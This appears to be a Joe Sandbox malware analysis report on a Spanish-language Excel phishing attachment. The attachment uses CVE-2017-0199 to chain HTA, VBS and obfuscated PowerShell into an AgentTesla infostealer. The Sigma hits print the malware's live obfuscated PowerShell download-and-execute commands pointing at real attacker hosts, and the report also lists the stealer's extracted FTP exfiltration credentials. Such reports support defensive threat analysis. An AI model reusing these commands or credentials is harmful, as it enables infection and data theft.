Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Source: Process started

Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2ejdq4gg\2ejdq4gg.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2ejdq4gg\2ejdq4gg.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\sYSteM32\WInDowspoWeRShelL\V1.0\POWeRSHElL.EXe" "PoWERsHelL.Exe -EX bYPAsS -noP -W 1 -c DEvIceCrEdenTialdEPLoyment.Exe ; INVoKe-ExPReSSIOn($(InVOkE-exPReSSIon('[sYStEM.Text.ENcODInG]'+[CHAR]58+[CHar]58+'utf8.GETstRIng([sYstEM.CONVeRt]'+[ChAR]58+[chaR]58+'FROMBAsE64sTRING('+[CHaR]34+'JGsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtQmVyREVGaW5JVGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkQ2JwY2N4dVFRbSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJek1tLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFppdmRUcFYsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZVeUZIc2dOZSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrVU96SGNmbHp5KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZGZCIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIU2Jmb1ZwbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkazo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyLjEzL3hhbXBwL3NlL3NlZXRoZWJlc3R0aGluZ3NlbnRpcmV0aW1ld2l0aGdyZWF0dGhpbmdzd2l0aGxvdmVya2lzcy50SUYiLCIkRW5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGluZ3N3aXRobG92ZXJraXMudmJTIiwwLDApO1NUYVJ0LXNsZUVwKDMpO2lFeCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGluZ3N3aXRobG92ZXJraXMudmJTIg=='+[cHaR]0x22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3656, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2ejdq4gg\2ejdq4gg.cmdline", ProcessId: 3880, ProcessName: csc.exe

Sigma detected: Excel Network Connections

Source: Network Connection

Author: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 198.244.140.41, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3216, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49161

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3656, TargetFilename: C:\Users\user\AppData\Roaming\seethebestthingsentiretimewithgreatthingswithloverkis.vbS

Sigma detected: Suspicious DNS Query for IP Lookup Service APIs

Source: DNS query

Author: Brandon George (blog post), Thomas Patzke: Data: Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe, QueryName: ip-api.com

Sigma detected: Suspicious Office Outbound Connections

Source: Network Connection

Author: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49161, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3216, Protocol: tcp, SourceIp: 198.244.140.41, SourceIsIpv6: false, SourcePort: 443

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('Dp3imageUrl = F1mhttps://1017.filemail.com/api/file/get?filekey=2'+'Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f F1m;Dp3we'+'bClient = New-Object System.Net.WebClient;Dp3imageBytes = Dp3webClient'+'.Dow'+'nloadData(Dp3imag'+'eUr'+'l);Dp3imageTex'+'t = [System.Text.Encoding]::UTF8.GetString(Dp3imageBytes);Dp3startFlag = F1m<'+'<BASE64_START>>F1m'+';Dp3endFlag = F1m<<BASE64_END>>F1m;Dp3startI'+'ndex = Dp3imageText.IndexOf(Dp3startFlag);Dp3endInde'+'x = Dp3imageText.IndexOf(Dp3en'+'d'+'Flag);Dp3startIndex -'+'ge 0 -and Dp3endIndex -g'+'t Dp3startIndex;Dp3startIndex += Dp3start'+'F'+'lag.Length;Dp3base64Length = Dp3endIndex - Dp3startIndex;Dp3bas'+'e64Command = Dp3imageText.Substring(Dp3startIndex, Dp3base64Length);Dp3base64Rever'+'sed = -join (Dp3base64Command.ToCh'+'arAr'+'ray() 59t ForEach-Object { Dp3_ })[-1..-'+'(Dp3base64Comma'+'nd.Length)];Dp3commandBytes = [System.Convert]::FromBase64Strin'+'g('+'Dp3b'+'ase64Reversed);Dp3load'+'edAssembly = [System.Refle'+'ction.Assembly]'+'::Load(Dp3commandBytes);Dp3vaiMethod'+' ='+' [d'+'nlib.IO.Home].GetMethod(F1mVAIF1m);Dp3vaiMethod.Invo'+'ke(Dp3null, @(F1mtxt.FRFFRW/253/31.22.3.291//:ptthF1m, F1mdesativadoF1m, F'+'1mdesativadoF1m, F1mdesativadoF1m, F1mAddInP'+'rocess3'+'2F1m, F1mdesativadoF1m, F1mdesativadoF1m,F1mdesativadoF1m,F1mdesativadoF1'+'m,F1m'+'desativadoF1m,F1mdesativadoF1m,'+'F1mdesativadoF1m,F1m1F1m,F1mdesativadoF1m));').REplace(([chaR]70+[chaR]49+[chaR]109),[sTRINg][chaR]39).REplace(([chaR]68+[chaR]112+[chaR]51),'$').REplace(([chaR]53+[chaR]57+[chaR]116),[sTRINg][chaR]124)| .((Get-VARIabLE '*mdr*').Name[3,11,2]-JoiN'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('Dp3imageUrl = F1mhttps://1017.filemail.com/api/file/get?filekey=2'+'Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f F1m;Dp3we'+'bClient = New-Object System.Net.WebClient;Dp3imageBytes = Dp3webClient'+'.Dow'+'nloadData(Dp3imag'+'eUr'+'l);Dp3imageTex'+'t = [System.Text.Encoding]::UTF8.GetString(Dp3imageBytes);Dp3startFlag = F1m<'+'<BASE64_START>>F1m'+';Dp3endFlag = F1m<<BASE64_END>>F1m;Dp3startI'+'ndex = Dp3imageText.IndexOf(Dp3startFlag);Dp3endInde'+'x = Dp3imageText.IndexOf(Dp3en'+'d'+'Flag);Dp3startIndex -'+'ge 0 -and Dp3endIndex -g'+'t Dp3startIndex;Dp3startIndex += Dp3start'+'F'+'lag.Length;Dp3base64Length = Dp3endIndex - Dp3startIndex;Dp3bas'+'e64Command = Dp3imageText.Substring(Dp3startIndex, Dp3base64Length);Dp3base64Rever'+'sed = -join (Dp3base64Command.ToCh'+'arAr'+'ray() 59t ForEach-Object { Dp3_ })[-1..-'+'(Dp3base64Comma'+'nd.Length)];Dp3commandBytes = [System.Convert]::FromBase64Strin'+'g('+'Dp3b'+'ase64Reversed);Dp3load'+'edAssembly = [System.Refle'+'ction.Assembly]'+

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingsentiretimewithgreatthingswithloverkis.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingsentiretimewithgreatthingswithloverkis.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\sYSteM32\WInDowspoWeRShelL\V1.0\POWeRSHElL.EXe" "PoWERsHelL.Exe -EX bYPAsS -noP -W 1 -c DEvIceCrEdenTialdEPLoyment.Exe ; INVoKe-ExPReSSIOn($(InVOkE-exPReSSIon('[sYStEM.Text.ENcODInG]'+[CHAR]58+[CHar]58+'utf8.GETstRIng([sYstEM.CONVeRt]'+[ChAR]58+[chaR]58+'FROMBAsE64sTRING('+[CHaR]34+'JGsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtQmVyREVGaW5JVGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkQ2JwY2N4dVFRbSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJek1tLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFppdmRUcFYsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZVeUZIc2dOZSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrVU96SGNmbHp5KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZGZCIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIU2Jmb1ZwbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkazo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyLjEzL3hhbXBwL3NlL3NlZXRoZWJlc3R0aGluZ3NlbnRpcmV0aW1ld2l0aGdyZWF0dGhpbmdzd2l0aGxvdmVya2lzcy50SUYiLCIkRW5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGluZ3N3aXRobG92ZXJraXMudmJTIiwwLDApO1NUYVJ0LXNsZUVwKDMpO2lFeCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGluZ3N3aXRobG92ZXJraXMudmJTIg=='+[cHaR]0x22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3656, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingsentiretimewithgreatthingswithloverkis.vbS" , ProcessId: 3972, ProcessName: wscript.exe

Sigma detected: Dynamic CSharp Compile Artefact

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3656, TargetFilename: C:\Users\user\AppData\Local\Temp\2ejdq4gg\2ejdq4gg.cmdline

Sigma detected: Modification of IE Registry Settings

Source: Registry Key set

Author: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3216, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\sYSteM32\WInDowspoWeRShelL\V1.0\POWeRSHElL.EXe" "PoWERsHelL.Exe -EX bYPAsS -noP -W 1 -c DEvIceCrEdenTialdEPLoyment.Exe ; INVoKe-ExPReSSIOn($(InVOkE-exPReSSIon('[sYStEM.Text.ENcODInG]'+[CHAR]58+[CHar]58+'utf8.GETstRIng([sYstEM.CONVeRt]'+[ChAR]58+[chaR]58+'FROMBAsE64sTRING('+[CHaR]34+'JGsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtQmVyREVGaW5JVGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkQ2JwY2N4dVFRbSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJek1tLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFppdmRUcFYsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZVeUZIc2dOZSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrVU96SGNmbHp5KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZGZCIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIU2Jmb1ZwbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkazo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyLjEzL3hhbXBwL3NlL3NlZXRoZWJlc3R0aGluZ3NlbnRpcmV0aW1ld2l0aGdyZWF0dGhpbmdzd2l0aGxvdmVya2lzcy50SUYiLCIkRW5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGluZ3N3aXRobG92ZXJraXMudmJTIiwwLDApO1NUYVJ0LXNsZUVwKDMpO2lFeCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGluZ3N3aXRobG92ZXJraXMudmJTIg=='+[cHaR]0x22+'))')))", CommandLine: "C:\Windows\sYSteM32\WInDowspoWeRShelL\V1.0\POWeRSHElL.EXe" "PoWERsHelL.Exe -EX bYPAsS -noP -W 1 -c DEvIceCrEdenTialdEPLoyment.Exe ; INVoKe-ExPReSSIOn($(InVOkE-exPReSSIon('[sYStEM.Text.ENcODInG]'+[CHAR]58+[CHar]58+'utf8.GETstRIng([sYstEM.CONVeRt]'+[ChAR]58+[chaR]58+'FROMBAsE64sTRING('+[CHaR]34+'JGsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtQmVyREVGaW5JVGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkQ2JwY2N4dVFRbSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJek1tLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFppdmRUcFYsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZVeUZIc

Sigma detected: Potential Encoded PowerShell Patterns In CommandLine

Source: Process started

Sigma detected: PowerShell Script Dropped Via PowerShell.EXE

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3656, TargetFilename: C:\Users\user\AppData\Local\Temp\htbay350.5by.ps1

Data Obfuscation

Sigma detected: Dot net compiler compiles file from suspicious location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2ejdq4gg\2ejdq4gg.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2ejdq4gg\2ejdq4gg.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\sYSteM32\WInDowspoWeRShelL\V1.0\POWeRSHElL.EXe" "PoWERsHelL.Exe -EX bYPAsS -noP -W 1 -c DEvIceCrEdenTialdEPLoyment.Exe ; INVoKe-ExPReSSIOn($(InVOkE-exPReSSIon('[sYStEM.Text.ENcODInG]'+[CHAR]58+[CHar]58+'utf8.GETstRIng([sYstEM.CONVeRt]'+[ChAR]58+[chaR]58+'FROMBAsE64sTRING('+[CHaR]34+'JGsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtQmVyREVGaW5JVGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkQ2JwY2N4dVFRbSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJek1tLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFppdmRUcFYsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZVeUZIc2dOZSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrVU96SGNmbHp5KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZGZCIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIU2Jmb1ZwbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkazo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyLjEzL3hhbXBwL3NlL3NlZXRoZWJlc3R0aGluZ3NlbnRpcmV0aW1ld2l0aGdyZWF0dGhpbmdzd2l0aGxvdmVya2lzcy50SUYiLCIkRW5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGluZ3N3aXRobG92ZXJraXMudmJTIiwwLDApO1NUYVJ0LXNsZUVwKDMpO2lFeCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGluZ3N3aXRobG92ZXJraXMudmJTIg=='+[cHaR]0x22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3656, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2ejdq4gg\2ejdq4gg.cmdline", ProcessId: 3880, ProcessName: csc.exe

Suricata Signatures

ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-20T07:49:58.566918+0100	2024197	1	A Network Trojan was detected	192.3.22.13	80	192.168.2.22	49162	TCP
2024-11-20T07:50:01.056946+0100	2024197	1	A Network Trojan was detected	192.3.22.13	80	192.168.2.22	49164	TCP

ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-20T07:49:58.566915+0100	2024449	1	Attempted User Privilege Gain	192.168.2.22	49162	192.3.22.13	80	TCP
2024-11-20T07:50:01.056934+0100	2024449	1	Attempted User Privilege Gain	192.168.2.22	49164	192.3.22.13	80	TCP

ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-20T07:50:32.818164+0100	2020423	1	Exploit Kit Activity Detected	192.3.22.13	80	192.168.2.22	49167	TCP

ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-20T07:49:57.045480+0100	2057635	1	A Network Trojan was detected	192.3.22.13	80	192.168.2.22	49167	TCP

ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-20T07:50:18.322154+0100	2049038	1	A Network Trojan was detected	142.215.209.78	443	192.168.2.22	49166	TCP

ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-20T07:49:57.045480+0100	2858295	1	A Network Trojan was detected	192.3.22.13	80	192.168.2.22	49167	TCP

ETPRO MALWARE ReverseLoader Payload Request (GET) M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-20T07:50:32.630460+0100	2858796	1	A Network Trojan was detected	192.168.2.22	49167	192.3.22.13	80	TCP

ETPRO MALWARE ReverseLoader Payload Request (GET) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-20T07:50:09.525871+0100	2858795	1	A Network Trojan was detected	192.168.2.22	49165	192.3.22.13	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: Env#U00edo de Orden de Compra No. 43456435344657.xla.xlsx

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\~DFC601DD9C0FBA6613.TMP

Avira: detection malicious, Label: TR/AVI.Agent.xoswb

Found malware configuration

Source: 18.2.AddInProcess32.exe.400000.0.unpack

Malware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.elquijotebanquetes.com", "Username": "mybloddycockcpanel_owner@elquijotebanquetes.com", "Password": "4r@d15PS!-!h"}

Multi AV Scanner detection for submitted file

Source: Env#U00edo de Orden de Compra No. 43456435344657.xla.xlsx

ReversingLabs: Detection: 26%

Machine Learning detection for sample

Source: Env#U00edo de Orden de Compra No. 43456435344657.xla.xlsx

Joe Sandbox ML: detected

Phishing

Yara detected HtmlPhish44

Source: Yara match

File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seethebestthingswithgreatsituationshandletotheprogress[1].hta, type: DROPPED

Source: unknown

HTTPS traffic detected: 142.215.209.78:443 -> 192.168.2.22:49166 version: TLS 1.0

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 198.244.140.41:443 -> 192.168.2.22:49161 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 198.244.140.41:443 -> 192.168.2.22:49163 version: TLS 1.2

Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\2ejdq4gg\2ejdq4gg.pdb source: powershell.exe, 00000005.00000002.501953877.0000000002481000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\2ejdq4gg\2ejdq4gg.pdbhP source: powershell.exe, 00000005.00000002.501953877.0000000002481000.00000004.00000800.00020000.00000000.sdmp

Software Vulnerabilities

Document exploit detected (process start blacklist hit)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\System32\mshta.exe

Suspicious execution chain found

Source: C:\Windows\System32\wscript.exe

Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Source: global traffic	DNS query: name: provit.uk
Source: global traffic	DNS query: name: provit.uk
Source: global traffic	DNS query: name: 1017.filemail.com
Source: global traffic	DNS query: name: 1017.filemail.com
Source: global traffic	DNS query: name: ip-api.com

Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 208.95.112.1:80
